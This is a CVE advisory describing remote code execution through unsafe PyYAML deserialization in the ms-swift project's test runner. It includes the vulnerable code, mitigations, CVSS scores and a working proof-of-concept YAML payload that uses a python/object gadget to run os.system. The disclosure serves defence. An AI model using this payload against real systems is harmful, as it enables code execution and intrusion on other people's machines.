CVE-2025-50460
CRITICAL9.8EPSS 7.1%MS SWIFT Remote Code Execution via unsafe PyYAML deserialization
Description
## Description A Remote Code Execution (RCE) vulnerability exists in the [modelscope/ms-swift](https://github.com/modelscope/ms-swift) project due to unsafe use of `yaml.load()` in combination with vulnerable versions of the PyYAML library (≤ 5.3.1). The issue resides in the `tests/run.py` script, where a user-supplied YAML configuration file is deserialized using `yaml.load()` with `yaml.FullLoader`. If an attacker can control or replace the YAML configuration file provided to the `--run_config` argument, they may inject a malicious payload that results in arbitrary code execution. ## Affected Repository - **Project:** [modelscope/ms-swift](https://github.com/modelscope/ms-swift) - **Affect versions:** latest - **File:** `tests/run.py` - **GitHub Permalink:** https://github.com/modelscope/ms-swift/blob/e02ebfdf34f979bbdba9d935acc1689f8d227b38/tests/run.py#L420 - **Dependency:** PyYAML <= 5.3.1 ## Vulnerable Code ```python if args.run_config is not None and Path(args.run_config).exists(): with open(args.run_config, encoding='utf-8') as f: run_config = yaml.load(f, Loader=yaml.FullLoader) ``` ## Proof of Concept (PoC) ### Step 1: Create malicious YAML file (`exploit.yaml`) ```yaml !!python/object/new:type args: ["z", !!python/tuple [], {"extend": !!python/name:exec }] listitems: "__import__('os').system('mkdir HACKED')" ``` ### Step 2: Execute with vulnerable PyYAML (<= 5.3.1) ```python import yaml with open("exploit.yaml", "r") as f: cfg = yaml.load(f, Loader=yaml.FullLoader) ``` This results in execution of `os.system`, proving code execution. ## Mitigation * Replace `yaml.load()` with `yaml.safe_load()` * Upgrade PyYAML to version 5.4 or later ### Example Fix: ```python # Before yaml.load(f, Loader=yaml.FullLoader) # After yaml.safe_load(f) ``` ## Author * Discovered by: Yu Rong (戎誉) and Hao Fan (凡浩) * Contact: *\[[[email protected]](mailto:[email protected])]*
Affected packages (1)
- PyPI/ms-swiftfrom 0, <= 3.6.3
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 4.0 | — | CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N |
| osv | CVSS 3.1 | CRITICAL9.8 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
References (8)
- ADVISORYhttps://github.com/advisories/GHSA-6757-jp84-gxfx
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2025-50460
- PATCHhttps://github.com/modelscope/ms-swift
- WEBhttps://github.com/Anchor0221/CVE-2025-50460
- WEBhttps://github.com/modelscope/ms-swift/blob/main/tests/run.py#L420
- WEBhttps://github.com/modelscope/ms-swift/commit/b3418ed9b050dc079553c275c5ed14cfb2b66cf7
- WEBhttps://github.com/modelscope/ms-swift/pull/5174
- WEBhttps://github.com/modelscope/ms-swift/security/advisories/GHSA-fm6c-f59h-7mmg